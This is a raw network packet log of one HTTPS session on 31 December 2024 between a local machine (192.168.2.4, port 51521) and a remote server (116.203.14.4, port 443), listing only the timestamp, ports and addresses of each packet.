Dec 31, 2024 16:58:00.667968988 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.667988062 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.668009996 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.668026924 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.668034077 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.668071985 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.668080091 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.668097973 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.668102980 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.668147087 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.668158054 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.668200970 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.668206930 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.668224096 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.668229103 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.668277979 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.668329000 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.668370008 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.668416977 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.668453932 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.677186012 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.677351952 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.677366018 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.677372932 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.677381039 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.677397966 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.677403927 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.677469969 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.677483082 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.677504063 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.677568913 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.677577972 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.677589893 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.677639008 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.677690983 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.678468943 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.678567886 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.678580046 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.678596020 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.678601980 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.678678036 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.678684950 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.678699017 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.678754091 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.678792953 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.678798914 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.678827047 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.678879023 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.682826042 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.682997942 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.683013916 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.683018923 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.683032036 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.683049917 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.683058977 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.683062077 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.683075905 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.683095932 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.683116913 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.683155060 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.683165073 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.683202028 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.683208942 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.683218956 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.683228016 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.683273077 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.683290005 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.683294058 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.683331013 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.683337927 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.683377028 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.683388948 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.683414936 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.683422089 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.683433056 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.683464050 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.683478117 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.683485031 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.683501959 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.683532953 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.683552980 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.683593035 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.683610916 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.683650970 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.683696985 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.683743000 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.683780909 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.687231064 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.687346935 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.687355042 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.687374115 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.687378883 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.687386990 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.687402964 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.687416077 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.687431097 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.687438965 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.687472105 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.687485933 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.687485933 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.687505960 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.687517881 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.687551022 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.687560081 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.687587976 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.687589884 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.687597990 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.687623978 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.687644958 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.687650919 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.687659979 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.687671900 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.687680960 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.687710047 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.687725067 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.687731981 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.687746048 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.687789917 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.687798023 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.687814951 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.687864065 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.687874079 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.687920094 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.687926054 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.687939882 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.687974930 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.688014030 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.688118935 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.688220024 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.688231945 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.688241959 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.688282013 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.688297033 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.688323975 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.688329935 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.688343048 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.688366890 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.688379049 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.688411951 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.688417912 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.688436985 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.688441992 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.688461065 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.688477039 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.688513994 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.688514948 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.688519955 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.688536882 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.688539028 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.688565969 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.688597918 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.688600063 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.688623905 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.688632011 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.688667059 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.688699007 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.688719988 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.688764095 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.688800097 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.688827038 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.688875914 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.688942909 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.689048052 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.689080954 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.689101934 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.689218044 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.689275980 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.689292908 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.689397097 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.692804098 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.692864895 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.692965984 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.693006992 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.693141937 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.693167925 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.693188906 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.693290949 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.693536043 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.693620920 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.693631887 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.693736076 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.693778992 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.693900108 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.693964958 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.694108009 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.694185972 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.694246054 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.694369078 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.694390059 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.694519043 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.694541931 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.694653034 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.739085913 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.739144087 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.739248991 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.739279032 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.739295006 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.739379883 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.739437103 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.739511967 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.739598036 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.739651918 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.739743948 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.739836931 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.739866972 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.739945889 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.740032911 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.740072012 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.740153074 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.740242004 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.740284920 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.740366936 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.740456104 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.740487099 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.740561962 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.740653038 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.740688086 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.740942001 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.741050959 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.741076946 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.741132975 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.741198063 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.741292953 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.741333008 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.741415024 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.741513014 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.741550922 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.741695881 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.741791964 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.741837978 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.741915941 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.742002964 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.742043018 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.742137909 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.742233992 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.742279053 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.742425919 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.742533922 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.742553949 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.742630959 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.742717028 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.742757082 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.742877007 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.742975950 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.743035078 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.743128061 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.743216038 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.743252993 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.743340015 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.743417025 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.743468046 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.743571043 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.743659019 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.743731976 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.743757010 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.743844986 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.758904934 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.759047985 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.759159088 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.759219885 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.759306908 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.759408951 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.759437084 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.759480000 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.759579897 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.760050058 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.760175943 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.760217905 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.760238886 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.803340912 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.811054945 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.811527967 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.811681986 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.811718941 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.811721087 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.811745882 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.811758995 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.811772108 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.811825991 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.811830997 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.811836958 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.811850071 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.811851978 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.811883926 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.811892033 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.811904907 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.811917067 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.811954975 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.811965942 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.811990023 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.853020906 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.853198051 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.853324890 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.853419065 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.853442907 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.853554964 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.895330906 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.899094105 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.899568081 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.899590969 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.899918079 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.900058985 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.900095940 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.900100946 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.900110960 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.900121927 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.900125980 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.900139093 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.900144100 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.900186062 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.900192022 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.900269032 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.900281906 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.900299072 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.900316000 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.900329113 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.900366068 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.900383949 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.900409937 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.900517941 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.900983095 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.901127100 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.901160002 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.901175976 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.901210070 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.901228905 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.901298046 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.901309967 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.901318073 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.901323080 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.901360989 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.901396036 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.901407957 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.901417017 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.901426077 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.901534081 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.902067900 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.902205944 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.902228117 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.902250051 CET	51521	443	192.168.2.4	116.203.14.4
